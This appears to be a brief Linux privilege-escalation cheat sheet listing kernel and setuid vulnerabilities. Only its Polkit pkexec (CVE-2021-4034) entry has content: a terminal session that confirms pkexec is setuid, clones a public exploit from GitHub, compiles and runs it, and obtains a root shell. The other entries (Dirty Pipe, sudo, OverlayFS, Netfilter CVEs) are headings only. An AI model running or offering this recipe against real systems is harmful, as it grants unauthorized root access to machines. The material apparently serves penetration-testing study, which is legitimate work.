Critical Vulnerabilities
Polkit (CVE-2021-4034)
#pkexec has assigned setuid means is vulnerable
cry0l1t3@nix02:~$ ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
cry0l1t3@nix02:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git
cry0l1t3@nix02:~$ cd CVE-2021-4034
cry0l1t3@nix02:~$ gcc cve-2021-4034-poc.c -o poc -static
cry0l1t3@nix02:~$ ./poc
# id
uid=0(root) gid=0(root) groups=0(root)Dirty Pipe (CVE-2022-0847)
Sudo privilege escalation
CVE-2021-3156
Ubuntu OverlayFS Local Privesc CVE-2021-3493
Netfilter
CVE-2021-22555
CVE-2022-25636
CVE-2023-32233
Last updated